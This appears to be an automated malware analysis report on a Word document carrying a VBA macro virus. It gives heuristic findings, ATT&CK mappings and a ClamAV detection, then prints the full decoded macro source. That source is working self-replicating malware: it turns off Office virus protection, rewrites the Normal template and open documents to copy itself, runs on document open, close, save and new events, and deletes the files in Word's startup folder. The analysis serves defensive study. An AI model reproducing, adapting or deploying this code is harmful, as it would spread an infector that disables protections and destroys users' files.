MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1546.001 Event Triggered Execution: Run at Startup
The sample is a malicious OLE document containing VBA macros. The macros are designed to disable Office macro security features and replicate themselves to other documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's attempt to disable virus protection and modify the VBA project. The ClamAV detection 'Doc.Trojan.Touchme-1' further supports its malicious nature. The script's intent is to spread itself and impair defenses.
Heuristics 4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 43,520 bytes but its declared streams total only 16,490 bytes — 27,030 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3873 bytes |
SHA-256: 86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Touchme-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This code written by Reza Pc 212
' Copyright (C) 1999 ReYoKh Team Labs
' University of Gunadarma
'
' for all virii maker 'n the stupid jerk
'
' Last Up-Date 3 November 1999 [19.00:00]
Private Sub Infected()
On Error Resume Next
ID = "'tHe FuCkIng aV if TOuCh mE"
Dim ADSave, NTSave, ADInfect, NTInfect As Boolean
Dim Listing, Active, Ultah, Name As String
Dim AD, NT As Object
Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If AD.Lines(99, 1) = ID Then ADInfect = True
If NT.Lines(99, 1) = ID Then NTInfect = True
ActiveDocument.Protect -1
ActiveDocument.Password = ""
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
WordBasic.DisableAutoMacros True
Application.Caption = "Mikrosof Werd"
For Each Obj In ActiveDocument.VBProject.VBComponents
If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
For Each Obj In NormalTemplate.VBProject.VBComponents
If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If NTInfect = False Then
NTSave = NormalTemplate.Saved
Listing = AD.Lines(1, AD.CountOfLines)
NT.DeleteLines 1, NT.CountOfLines
NT.AddFromString Listing
If NTSave = True Then NormalTemplate.Save
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
End If
ADSave = ActiveDocument.Saved
Listing = NT.Lines(1, NT.CountOfLines)
AD.DeleteLines 1, AD.CountOfLines
AD.AddFromString Listing
If ADSave = True Then ActiveDocument.Save
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
If Day(Date) = 1 Then Name = ID
If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
If Name <> "" And Name <> ID Then
Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _
", I hope you always Happy"
Active = Assistant.Visible
Assistant.Visible = True
With Assistant.NewBalloon
.Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _
"Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah
.Show
End With
Assistant.Visible = Active
End If
Kill Application.StartupPath + "\*.*"
Options.VirusProtection = True
WordBasic.DisableAutoMacros False
End Sub
Private Sub Document_Close()
Infected
End Sub
Private Sub Document_Open()
Infected
End Sub
Private Sub Document_Save()
Infected
End Sub
Private Sub Document_New()
Infected
End Sub
Private Sub Document_Exit()
Infected
End Sub
Private Sub Document_Exec()
Infected
End Sub
'tHe FuCkIng aV if TOuCh mE
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.